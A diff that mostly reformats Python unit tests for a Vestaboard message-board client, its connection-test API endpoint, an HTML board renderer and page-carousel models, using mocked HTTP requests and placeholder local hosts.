     VALID_STRATEGIES,
+    BoardClient,
     is_successful_board_read_response,
     parse_read_message_payload,
     strip_color_markers,
@@ -17,33 +17,33 @@ from src.board_client import (
 
 class TestStripColorMarkers:
     """Tests for color marker stripping."""
-    
+
     def test_strip_numeric_color_codes(self):
         """Test stripping numeric color codes like {63}."""
         text = "{63}Red text{/}"
         assert strip_color_markers(text) == "Red text"
-    
+
     def test_strip_named_colors(self):
         """Test stripping named colors like {red}."""
         text = "{red}Warning{/red}"
         assert strip_color_markers(text) == "Warning"
-    
+
     def test_strip_multiple_colors(self):
         """Test stripping multiple color markers."""
         text = "{66}Guest WiFi{/}\n{67}SSID: {68}network{/}"
         assert strip_color_markers(text) == "Guest WiFi\nSSID: network"
-    
+
     def test_preserve_non_color_braces(self):
         """Test that non-color braces are preserved."""
         text = "Hello {world} test"
         assert strip_color_markers(text) == "Hello {world} test"
-    
+
     def test_strip_all_color_codes(self):
         """Test all color codes are stripped."""
         for code in range(63, 71):
             text = f"{{{code}}}test{{/}}"
             assert strip_color_markers(text) == "test"
-    
+
     def test_case_insensitive(self):
         """Test that named colors are stripped case-insensitively."""
         assert strip_color_markers("{RED}test{/RED}") == "test"
@@ -52,115 +52,105 @@ class TestStripColorMarkers:
 
 class TestBoardClientInit:
     """Tests for BoardClient initialization."""
-    
+
     def test_init_with_valid_params(self):
         """Test successful initialization with valid parameters."""
-        client = BoardClient(
-            api_key="test_key",
-            host="192.168.0.11"
-        )
+        client = BoardClient(api_key="test_key", host="192.168.0.11")
         assert client.host == "192.168.0.11"
         assert client.skip_unchanged is True
         assert client.base_url == "http://192.168.0.11:7000/local-api/message"
         assert "X-Vestaboard-Local-Api-Key" in client.headers  # Official board API header
         assert client.headers["X-Vestaboard-Local-Api-Key"] == "test_key"
-    
+
     def test_init_with_hostname(self):
         """Test initialization with hostname instead of IP."""
-        client = BoardClient(
-            api_key="test_key",
-            host="board.local"
-        )
+        client = BoardClient(api_key="test_key", host="board.local")
         assert client.base_url == "http://board.local:7000/local-api/message"
-    
+
     def test_init_without_api_key_raises(self):
         """Test that missing api_key raises ValueError."""
         with pytest.raises(ValueError, match="api_key is required"):
             BoardClient(api_key="", host="192.168.0.11")
-    
+
     def test_init_without_host_raises(self):
         """Test that missing host raises ValueError."""
         with pytest.raises(ValueError, match="host is required"):
             BoardClient(api_key="test_key", host="")
-    
+
     def test_init_with_skip_unchanged_false(self):
         """Test initialization with skip_unchanged disabled."""
-        client = BoardClient(
-            api_key="test_key",
-            host="192.168.0.11",
-            skip_unchanged=False
-        )
+        client = BoardClient(api_key="test_key", host="192.168.0.11", skip_unchanged=False)
         assert client.skip_unchanged is False
 
 
 class TestSendText:
     """Tests for send_text method."""
-    
+
     @pytest.fixture
     def client(self):
         """Create a client for testing."""
         return BoardClient(api_key="test_key", host="192.168.0.11")
-    
-    @patch('src.board_client.requests.post')
+
+    @patch("src.board_client.requests.post")
     def test_send_text_success(self, mock_post, client):
         """Test successful text send."""
         mock_post.return_value.raise_for_status = Mock()
-        
+
         success, was_sent = client.send_text("Hello World")
-        
+
         assert success is True
         assert was_sent is True
         mock_post.assert_called_once()
         call_args = mock_post.call_args
         assert call_args.kwargs["json"] == {"text": "HELLO WORLD"}
-    
-    @patch('src.board_client.requests.post')
+
+    @patch("src.board_client.requests.post")
     def test_send_text_cached_skips(self, mock_post, client):
         """Test that sending same text twice skips the second send."""
         mock_post.return_value.raise_for_status = Mock()
-        
+
         # First send
         client.send_text("Hello World")
-        
+
         # Second send (should skip)
         success, was_sent = client.send_text("Hello World")
-        
+
         assert success is True
         assert was_sent is False
         assert mock_post.call_count == 1  # Only called once
-    
-    @patch('src.board_client.requests.post')
+
+    @patch("src.board_client.requests.post")
     def test_send_text_force_ignores_cache(self, mock_post, client):
         """Test that force=True ignores cache."""
         mock_post.return_value.raise_for_status = Mock()
-        
+
         # First send
         client.send_text("Hello World")
-        
+
         # Second send with force
         success, was_sent = client.send_text("Hello World", force=True)
-        
+
         assert success is True
         assert was_sent is True
         assert mock_post.call_count == 2
-    
-    @patch('src.board_client.requests.post')
+
+    @patch("src.board_client.requests.post")
     def test_send_text_network_error(self, mock_post, client):
         """Test handling of network error."""
         mock_post.side_effect = requests.exceptions.ConnectionError("Network error")
-        
+
         success, was_sent = client.send_text("Hello World")
-        
+
         assert success is False
         assert was_sent is False
-    
-    @patch('src.board_client.requests.post')
+
+    @patch("src.board_client.requests.post")
     def test_send_text_strips_color_markers(self, mock_post, client):
         """Test that color markers are stripped from text."""
         mock_post.return_value.raise_for_status = Mock()
-        
+
         success, was_sent = client.send_text("{63}Warning{/}: Check {66}status{/}")
-        
+
         assert success is True
         assert was_sent is True
         call_args = mock_post.call_args
@@ -170,41 +160,36 @@ class TestSendText:
 
 class TestSendCharacters:
     """Tests for send_characters method."""
-    
+
     @pytest.fixture
     def client(self):
         """Create a client for testing."""
         return BoardClient(api_key="test_key", host="192.168.0.11")
-    
+
     @pytest.fixture
     def valid_grid(self):
         """Create a valid 6x22 character grid."""
         return [[0] * 22 for _ in range(6)]
-    
-    @patch('src.board_client.requests.post')
+
+    @patch("src.board_client.requests.post")
     def test_send_characters_success(self, mock_post, client, valid_grid):
         """Test successful character array send."""
         mock_post.return_value.raise_for_status = Mock()
-        
+
         success, was_sent = client.send_characters(valid_grid)
-        
+
         assert success is True
         assert was_sent is True
         call_args = mock_post.call_args
         assert call_args.kwargs["json"]["characters"] == valid_grid
-    
-    @patch('src.board_client.requests.post')
+
+    @patch("src.board_client.requests.post")
     def test_send_characters_with_transition(self, mock_post, client, valid_grid):
         """Test sending with transition settings."""
         mock_post.return_value.raise_for_status = Mock()
-        
-        success, was_sent = client.send_characters(
-            valid_grid,
-            strategy="column",
-            step_interval_ms=500,
-            step_size=2
-        )
-        
+
+        success, was_sent = client.send_characters(valid_grid, strategy="column", step_interval_ms=500, step_size=2)
+
         assert success is True
         assert was_sent is True
         call_args = mock_post.call_args
@@ -212,53 +197,53 @@ class TestSendCharacters:
         assert payload["strategy"] == "column"
         assert payload["step_interval_ms"] == 500
         assert payload["step_size"] == 2
-    
-    @patch('src.board_client.requests.post')
+
+    @patch("src.board_client.requests.post")
     def test_send_characters_all_strategies(self, mock_post, client, valid_grid):
         """Test all valid transition strategies."""
         mock_post.return_value.raise_for_status = Mock()
-        
+
         for strategy in VALID_STRATEGIES:
             client.clear_cache()  # Clear cache between tests
             success, was_sent = client.send_characters(valid_grid, strategy=strategy)
             assert success is True, f"Strategy {strategy} failed"
-    
+
     def test_send_characters_invalid_strategy(self, client, valid_grid):
         """Test that invalid strategy returns error."""
         success, was_sent = client.send_characters(valid_grid, strategy="invalid")
-        
+
         assert success is False
         assert was_sent is False
-    
+
     def test_send_characters_invalid_rows(self, client):
         """Test that wrong number of rows returns error."""
         invalid_grid = [[0] * 22 for _ in range(5)]  # Only 5 rows
-        
+
         success, was_sent = client.send_characters(invalid_grid)
-        
+
         assert success is False
         assert was_sent is False
-    
+
     def test_send_characters_invalid_columns(self, client):
         """Test that wrong number of columns returns error."""
         invalid_grid = [[0] * 20 for _ in range(6)]  # Only 20 columns
-        
+
         success, was_sent = client.send_characters(invalid_grid)
-        
+
         assert success is False
         assert was_sent is False
-    
-    @patch('src.board_client.requests.post')
+
+    @patch("src.board_client.requests.post")
     def test_send_characters_cached_skips(self, mock_post, client, valid_grid):
         """Test that sending same characters twice skips the second send."""
         mock_post.return_value.raise_for_status = Mock()
-        
+
         # First send
         client.send_characters(valid_grid)
-        
+
         # Second send (should skip)
         success, was_sent = client.send_characters(valid_grid)
-        
+
         assert success is True
         assert was_sent is False
         assert mock_post.call_count == 1
@@ -295,45 +280,45 @@ class TestParseReadMessagePayload:
 
 class TestReadCurrentMessage:
     """Tests for read_current_message method."""
-    
+
     @pytest.fixture
     def client(self):
         """Create a client for testing."""
         return BoardClient(api_key="test_key", host="192.168.0.11")
-    
-    @patch('src.board_client.requests.get')
+
+    @patch("src.board_client.requests.get")
     def test_read_current_message_success(self, mock_get, client):
         """Test successful read of current message."""
         expected_chars = [[0] * 22 for _ in range(6)]
         mock_get.return_value.raise_for_status = Mock()
         mock_get.return_value.json.return_value = expected_chars
-        
+
         result = client.read_current_message()
-        
+
         assert result == expected_chars
-    
-    @patch('src.board_client.requests.get')
+
+    @patch("src.board_client.requests.get")
     def test_read_current_message_with_sync_cache(self, mock_get, client):
         """Test that sync_cache updates internal cache."""
         expected_chars = [[1] * 22 for _ in range(6)]
         mock_get.return_value.raise_for_status = Mock()
         mock_get.return_value.json.return_value = expected_chars
-        
+
         result = client.read_current_message(sync_cache=True)
-        
+
         assert result == expected_chars
         assert client._last_characters == expected_chars
-    
-    @patch('src.board_client.requests.get')
+
+    @patch("src.board_client.requests.get")
     def test_read_current_message_network_error(self, mock_get, client):
         """Test handling of network error during read."""
         mock_get.side_effect = requests.exceptions.ConnectionError("Network error")
-        
+
         result = client.read_current_message()
-        
+
         assert result is None
 
-    @patch('src.board_client.requests.get')
+    @patch("src.board_client.requests.get")
     def test_read_current_message_cloud_current_message_shape(self, mock_get):
         """Cloud API returns currentMessage.layout (stringified JSON)."""
         grid = [[0] * 15 for _ in range(3)]
@@ -347,77 +332,77 @@ class TestReadCurrentMessage:
 
 class TestCacheManagement:
     """Tests for cache management methods."""
-    
+
     @pytest.fixture
     def client(self):
         """Create a client for testing."""
         return BoardClient(api_key="test_key", host="192.168.0.11")
-    
+
     def test_clear_cache(self, client):
         """Test that clear_cache clears internal state."""
         client._last_text = "test"
         client._last_characters = [[0] * 22 for _ in range(6)]
-        
+
         client.clear_cache()
-        
+
         assert client._last_text is None
         assert client._last_characters is None
-    
+
     def test_get_cache_status_empty(self, client):
         """Test cache status when empty."""
         status = client.get_cache_status()
-        
+
         assert status["has_cached_text"] is False
         assert status["has_cached_characters"] is False
         assert status["skip_unchanged_enabled"] is True
-    
-    @patch('src.board_client.requests.post')
+
+    @patch("src.board_client.requests.post")
     def test_get_cache_status_with_text(self, mock_post, client):
         """Test cache status after sending text."""
         mock_post.return_value.raise_for_status = Mock()
         client.send_text("Hello World")
-        
+
         status = client.get_cache_status()
-        
+
         assert status["has_cached_text"] is True
         assert status["cached_text_preview"] == "HELLO WORLD"
-    
+
     def test_would_send_with_same_text(self, client):
         """Test would_send returns False for cached text."""
         client._last_text = "HELLO WORLD"
-        
+
         assert client.would_send(text="HELLO WORLD") is False
         assert client.would_send(text="Different") is True
-    
+
     def test_would_send_with_skip_unchanged_disabled(self, client):
         """Test would_send always returns True when caching disabled."""
         client.skip_unchanged = False
         client._last_text = "HELLO WORLD"
-        
+
         assert client.would_send(text="HELLO WORLD") is True
 
 
 class TestConnectionTest:
     """Tests for test_connection method."""
-    
+
     @pytest.fixture
     def client(self):
         """Create a client for testing."""
         return BoardClient(api_key="test_key", host="192.168.0.11")
-    
-    @patch('src.board_client.requests.get')
+
+    @patch("src.board_client.requests.get")
     def test_connection_success(self, mock_get, client):
         """Test successful connection test."""
         mock_get.return_value.raise_for_status = Mock()
         mock_get.return_value.json.return_value = [[0] * 22 for _ in range(6)]
-        
+
         assert client.test_connection() is True
-    
-    @patch('src.board_client.requests.get')
+
+    @patch("src.board_client.requests.get")
     def test_connection_failure(self, mock_get, client):
         """Test failed connection test."""
         mock_get.side_effect = requests.exceptions.ConnectionError("Network error")
-        
+
         assert client.test_connection() is False
 
 
@@ -541,7 +526,7 @@ class TestSendTextHTTPError:
     def client(self):
         return BoardClient(api_key="test_key", host="192.168.0.11")
 
-    @patch('src.board_client.requests.post')
+    @patch("src.board_client.requests.post")
     def test_send_text_http_error_with_response_body(self, mock_post, client):
         """Line 245: log response text on HTTP error."""
         mock_response = Mock()
@@ -571,7 +556,7 @@ class TestSendCharactersEdgeCases:
     def valid_grid(self):
         return [[0] * 22 for _ in range(6)]
 
-    @patch('src.board_client.requests.post')
+    @patch("src.board_client.requests.post")
     def test_send_characters_cloud_api_format(self, mock_post, cloud_client, valid_grid):
         """Lines 294-295 / 310: cloud API sends array directly as payload."""
         mock_post.return_value.raise_for_status = Mock()
@@ -594,7 +579,7 @@ class TestSendCharactersEdgeCases:
         assert success is False
         assert was_sent is False
 
-    @patch('src.board_client.requests.post')
+    @patch("src.board_client.requests.post")
     def test_send_characters_http_error_with_response(self, mock_post, client, valid_grid):
         """Lines 342-346: HTTP exception with response body in send_characters."""
         mock_response = Mock()
@@ -764,7 +749,7 @@ class TestTestConnectionException:
     def client(self):
         return BoardClient(api_key="test_key", host="192.168.0.11")
 
-    @patch('src.board_client.requests.get')
+    @patch("src.board_client.requests.get")
     def test_connection_unexpected_exception(self, mock_get, client):
         """Lines 428-430: non-request exception caught by broad except."""
         mock_get.side_effect = RuntimeError("Unexpected")
@@ -778,7 +763,7 @@ class TestSendCharactersNoResponseOnError:
     def client(self):
         return BoardClient(api_key="test_key", host="192.168.0.11")
 
-    @patch('src.board_client.requests.post')
+    @patch("src.board_client.requests.post")
     def test_send_characters_error_no_response(self, mock_post, client):
         """Line 344->346: exception without response attribute."""
         mock_post.side_effect = requests.exceptions.ConnectionError("timeout")

--- a/tests/test_board_connection_test.py
+++ b/tests/test_board_connection_test.py
@@ -7,16 +7,14 @@ every failure mode instead of a generic error.
 
 import json
 import re
-from urllib.parse import urlparse
-
 from unittest.mock import Mock, patch
+from urllib.parse import urlparse
 
 import pytest
 import requests
 from fastapi.testclient import TestClient
 
 from src.api_server import app
-
 
 _URL_RE = re.compile(r"https?://[^\s'\"<>]+")
 
@@ -46,6 +44,7 @@ def client():
 # Successful connection
 # ---------------------------------------------------------------------------
 
+
 class TestBoardTestSuccess:
     """Test successful board connection responses."""
 
@@ -63,11 +62,14 @@ class TestBoardTestSuccess:
         mock_resp.json.return_value = {"message": [[0] * 22] * 6}
         mock_get.return_value = mock_resp
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "key",
+                "host": "192.168.1.10",
+            },
+        )
 
         assert response.status_code == 200
         data = response.json()
@@ -88,11 +90,14 @@ class TestBoardTestSuccess:
         mock_resp.json.return_value = [[0] * 22] * 6
         mock_get.return_value = mock_resp
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "key",
+                "host": "192.168.1.10",
+            },
+        )
 
         data = response.json()
         assert data["success"] is True
@@ -111,10 +116,13 @@ class TestBoardTestSuccess:
         mock_resp.json.return_value = {"message": [[0] * 22] * 6}
         mock_get.return_value = mock_resp
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "cloud",
-            "cloud_key": "rw-key",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "cloud",
+                "cloud_key": "rw-key",
+            },
+        )
 
         data = response.json()
         assert data["success"] is True
@@ -123,6 +131,7 @@ class TestBoardTestSuccess:
 # ---------------------------------------------------------------------------
 # Authentication failures (401 / 403)
 # ---------------------------------------------------------------------------
+
 
 class TestBoardTestAuthFailure:
     """Test auth rejection error messages with troubleshooting steps."""
@@ -139,11 +148,14 @@ class TestBoardTestAuthFailure:
         mock_resp.status_code = 401
         mock_get.return_value = mock_resp
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "bad-key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "bad-key",
+                "host": "192.168.1.10",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -163,11 +175,14 @@ class TestBoardTestAuthFailure:
         mock_resp.status_code = 403
         mock_get.return_value = mock_resp
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "bad-key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "bad-key",
+                "host": "192.168.1.10",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -185,10 +200,13 @@ class TestBoardTestAuthFailure:
         mock_resp.status_code = 401
         mock_get.return_value = mock_resp
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "cloud",
-            "cloud_key": "bad-rw-key",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "cloud",
+                "cloud_key": "bad-rw-key",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -199,6 +217,7 @@ class TestBoardTestAuthFailure:
 # ---------------------------------------------------------------------------
 # Server errors (500+)
 # ---------------------------------------------------------------------------
+
 
 class TestBoardTestServerError:
     """Test server error messages with troubleshooting steps."""
@@ -215,11 +234,14 @@ class TestBoardTestServerError:
         mock_resp.status_code = 500
         mock_get.return_value = mock_resp
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "key",
+                "host": "192.168.1.10",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -239,11 +261,14 @@ class TestBoardTestServerError:
         mock_resp.status_code = 502
         mock_get.return_value = mock_resp
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "key",
+                "host": "192.168.1.10",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -253,6 +278,7 @@ class TestBoardTestServerError:
 # ---------------------------------------------------------------------------
 # Connection errors
 # ---------------------------------------------------------------------------
+
 
 class TestBoardTestConnectionError:
     """Test connection error messages with troubleshooting steps."""
@@ -267,11 +293,14 @@ class TestBoardTestConnectionError:
 
         mock_get.side_effect = requests.exceptions.ConnectionError("Connection refused")
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "key",
+                "host": "192.168.1.10",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -289,10 +318,13 @@ class TestBoardTestConnectionError:
 
         mock_get.side_effect = requests.exceptions.ConnectionError("no route")
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "cloud",
-            "cloud_key": "rw-key",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "cloud",
+                "cloud_key": "rw-key",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -303,6 +335,7 @@ class TestBoardTestConnectionError:
 # ---------------------------------------------------------------------------
 # Timeout errors
 # ---------------------------------------------------------------------------
+
 
 class TestBoardTestTimeout:
     """Test timeout error messages with troubleshooting steps."""
@@ -317,11 +350,14 @@ class TestBoardTestTimeout:
 
         mock_get.side_effect = requests.exceptions.Timeout("timed out")
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "key",
+                "host": "192.168.1.10",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -339,10 +375,13 @@ class TestBoardTestTimeout:
 
         mock_get.side_effect = requests.exceptions.Timeout("timed out")
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "cloud",
-            "cloud_key": "rw-key",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "cloud",
+                "cloud_key": "rw-key",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -353,6 +392,7 @@ class TestBoardTestTimeout:
 # ---------------------------------------------------------------------------
 # Unexpected response formats
 # ---------------------------------------------------------------------------
+
 
 class TestBoardTestUnexpectedResponse:
     """Test unexpected response format messages."""
@@ -371,11 +411,14 @@ class TestBoardTestUnexpectedResponse:
         mock_resp.json.return_value = {"status": "ok"}  # No "message" key, not a list
         mock_get.return_value = mock_resp
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "key",
+                "host": "192.168.1.10",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -446,11 +489,14 @@ class TestBoardTestUnexpectedResponse:
         mock_resp.json.side_effect = ValueError("Invalid JSON")
         mock_get.return_value = mock_resp
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "key",
+                "host": "192.168.1.10",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -469,11 +515,14 @@ class TestBoardTestUnexpectedResponse:
         mock_resp.status_code = 404
         mock_get.return_value = mock_resp
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "key",
+                "host": "192.168.1.10",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -493,11 +542,14 @@ class TestBoardTestUnexpectedResponse:
         mock_resp.json.return_value = []  # Empty list
         mock_get.return_value = mock_resp
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "key",
+                "host": "192.168.1.10",
+            },
+        )
 
         data = response.json()
         # Empty list → characters is None → unexpected format
@@ -507,6 +559,7 @@ class TestBoardTestUnexpectedResponse:
 # ---------------------------------------------------------------------------
 # General exception handling
 # ---------------------------------------------------------------------------
+
 
 class TestBoardTestGeneralError:
     """Test the catch-all exception handler."""
@@ -521,11 +574,14 @@ class TestBoardTestGeneralError:
 
         mock_get.side_effect = RuntimeError("unexpected error")
 
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "key",
-            "host": "192.168.1.10",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "key",
+                "host": "192.168.1.10",
+            },
+        )
 
         data = response.json()
         assert data["success"] is False
@@ -535,6 +591,7 @@ class TestBoardTestGeneralError:
 # ---------------------------------------------------------------------------
 # Troubleshooting field structure
 # ---------------------------------------------------------------------------
+
 
 class TestBoardTestTroubleshootingStructure:
     """Verify troubleshooting field is always a list of strings."""
@@ -554,14 +611,17 @@ class TestBoardTestTroubleshootingStructure:
             requests.exceptions.Timeout("timed out"),
         ]:
             mock_get.side_effect = exc
-            response = client.post("/config/board/test", json={
-                "api_mode": "local",
-                "local_api_key": "key",
-                "host": "192.168.1.10",
-            })
+            response = client.post(
+                "/config/board/test",
+                json={
+                    "api_mode": "local",
+                    "local_api_key": "key",
+                    "host": "192.168.1.10",
+                },
+            )
             data = response.json()
-            assert isinstance(data.get("troubleshooting"), list), \
+            assert isinstance(data.get("troubleshooting"), list), (
                 f"troubleshooting should be a list for {type(exc).__name__}"
+            )
             for step in data["troubleshooting"]:
-                assert isinstance(step, str), \
-                    f"Each troubleshooting step should be a string for {type(exc).__name__}"
+                assert isinstance(step, str), f"Each troubleshooting step should be a string for {type(exc).__name__}"

--- a/tests/test_board_html_renderer.py
+++ b/tests/test_board_html_renderer.py
@@ -11,8 +11,6 @@ from __future__ import annotations
 from types import SimpleNamespace
 from unittest.mock import MagicMock, patch
 
-import pytest
-
 from src.board_html_renderer import (
     DEVICE_DIMS,
     render_board_html,
@@ -109,9 +107,7 @@ class TestColorTokens:
 
 class TestHtmlEscaping:
     def test_page_name_is_escaped(self):
-        html = render_board_html(
-            "HI", device_type="flagship", page_name="<script>x</script>"
-        )
+        html = render_board_html("HI", device_type="flagship", page_name="<script>x</script>")
         assert "<script>x</script>" not in html
         assert "&lt;script&gt;" in html
 
@@ -135,9 +131,7 @@ class TestDocumentShell:
         assert "flap-in" in html
 
     def test_page_name_appears_in_label(self):
-        html = render_board_html(
-            "HI", device_type="flagship", page_name="Weather Today"
-        )
+        html = render_board_html("HI", device_type="flagship", page_name="Weather Today")
         assert "Weather Today" in html
 
 

--- a/tests/test_carousels.py
+++ b/tests/test_carousels.py
@@ -1,20 +1,21 @@
 """Tests for carousels module (models, storage, service, API)."""
 
 import math
+
 import pytest
+from pydantic import ValidationError
 
 from src.carousels.models import (
+    CAROUSEL_ID_PREFIX,
     Carousel,
     CarouselCreate,
     CarouselUpdate,
-    make_carousel_id,
-    is_carousel_id,
     extract_carousel_uuid,
-    CAROUSEL_ID_PREFIX,
+    is_carousel_id,
+    make_carousel_id,
 )
-from src.carousels.storage import CarouselStorage
 from src.carousels.service import CarouselService
-
+from src.carousels.storage import CarouselStorage
 
 # =============================================================================
 # Model Tests
@@ -83,9 +84,9 @@ class TestCarouselModels:
 
     def test_carousel_interval_range(self):
         """interval_seconds must be between 5 and 3600."""
-        with pytest.raises(Exception):
+        with pytest.raises(ValidationError):
             Carousel(name="Too Low", page_ids=["p1"], interval_seconds=1)
-        with pytest.raises(Exception):
+        with pytest.raises(ValidationError):
             Carousel(name="Too High", page_ids=["p1"], interval_seconds=7200)
 
     # --- Cycling Logic -------------------------------------------------------
@@ -93,7 +94,7 @@ class TestCarouselModels:
     def test_current_page_index_wraps(self):
         """current_page_index wraps around the page list."""
         c = Carousel(name="Cycle", page_ids=["a", "b", "c"], interval_seconds=10)
-        assert c.current_page_index(0) == 0   # t=0  → index 0
+        assert c.current_page_index(0) == 0  # t=0  → index 0
         assert c.current_page_index(10) == 1  # t=10 → index 1
         assert c.current_page_index(20) == 2  # t=20 → index 2
         assert c.current_page_index(30) == 0  # wraps
@@ -294,7 +295,7 @@ class TestCarouselStorage:
         s1 = CarouselStorage(str(path))
         c = Carousel(name="DT", page_ids=["p1"])
         created = s1.create(c)
-        updated = s1.update(created.id, {"name": "DT2"})
+        s1.update(created.id, {"name": "DT2"})
 
         s2 = CarouselStorage(str(path))
         fetched = s2.get(created.id)
@@ -367,9 +368,7 @@ class TestCarouselService:
 
     def test_resolve_page_id_specific_time(self, service):
         """resolve_page_id at a known timestamp is deterministic."""
-        created = service.create_carousel(
-            CarouselCreate(name="Fixed", page_ids=["a", "b", "c"], interval_seconds=10)
-        )
+        created = service.create_carousel(CarouselCreate(name="Fixed", page_ids=["a", "b", "c"], interval_seconds=10))
         assert service.resolve_page_id(created.id, now_unix=0.0) == "a"
         assert service.resolve_page_id(created.id, now_unix=10.0) == "b"
         assert service.resolve_page_id(created.id, now_unix=20.0) == "c"
@@ -383,25 +382,19 @@ class TestCarouselService:
 
     def test_seconds_until_next_page_single(self, service):
         """Single-page carousels return None (no cycling)."""
-        created = service.create_carousel(
-            CarouselCreate(name="One", page_ids=["p1"], interval_seconds=10)
-        )
+        created = service.create_carousel(CarouselCreate(name="One", page_ids=["p1"], interval_seconds=10))
         assert service.seconds_until_next_page(created.id) is None
 
     def test_seconds_until_next_page_multi(self, service):
         """Multi-page carousel returns a positive value."""
-        created = service.create_carousel(
-            CarouselCreate(name="Multi", page_ids=["a", "b"], interval_seconds=10)
-        )
+        created = service.create_carousel(CarouselCreate(name="Multi", page_ids=["a", "b"], interval_seconds=10))
         secs = service.seconds_until_next_page(created.id)
         assert secs is not None
         assert 1 <= secs <= 10
 
     def test_seconds_until_next_page_fixed_time(self, service):
         """At a known time, seconds_until_next_page is predictable."""
-        created = service.create_carousel(
-            CarouselCreate(name="Fixed", page_ids=["a", "b"], interval_seconds=10)
-        )
+        created = service.create_carousel(CarouselCreate(name="Fixed", page_ids=["a", "b"], interval_seconds=10))
         secs = service.seconds_until_next_page(created.id, now_unix=3.0)
         assert secs == 7  # 10 - 3 = 7
 
@@ -409,9 +402,7 @@ class TestCarouselService:
 
     def test_seconds_until_next_page_fractional_timestamp(self, service):
         """Fractional timestamps produce correct ceiling of remaining seconds."""
-        created = service.create_carousel(
-            CarouselCreate(name="Frac", page_ids=["a", "b"], interval_seconds=10)
-        )
+        created = service.create_carousel(CarouselCreate(name="Frac", page_ids=["a", "b"], interval_seconds=10))
         # At t=3.5, remaining is 6.5s -> should ceil to 7
         assert service.seconds_until_next_page(created.id, now_unix=3.5) == 7
         # At t=3.9, remaining is 6.1s -> should ceil to 7
@@ -421,34 +412,26 @@ class TestCarouselService:
 
     def test_seconds_until_next_page_at_boundary(self, service):
         """At exact interval boundary, a full interval remains."""
-        created = service.create_carousel(
-            CarouselCreate(name="Boundary", page_ids=["a", "b"], interval_seconds=10)
-        )
+        created = service.create_carousel(CarouselCreate(name="Boundary", page_ids=["a", "b"], interval_seconds=10))
         # At exactly t=10 (boundary), the next page is at t=20: 10 seconds away
         assert service.seconds_until_next_page(created.id, now_unix=10.0) == 10
 
     def test_seconds_until_next_page_just_before_boundary(self, service):
         """Just before a transition, minimum of 1 second is returned."""
-        created = service.create_carousel(
-            CarouselCreate(name="JustBefore", page_ids=["a", "b"], interval_seconds=10)
-        )
+        created = service.create_carousel(CarouselCreate(name="JustBefore", page_ids=["a", "b"], interval_seconds=10))
         # At t=9.999, remaining is 0.001s -> ceil to 1, max(1,1) = 1
         assert service.seconds_until_next_page(created.id, now_unix=9.999) == 1
 
     def test_seconds_until_next_page_never_zero(self, service):
         """seconds_until_next_page never returns 0 due to max(1, ...) guard."""
-        created = service.create_carousel(
-            CarouselCreate(name="NonZero", page_ids=["a", "b"], interval_seconds=10)
-        )
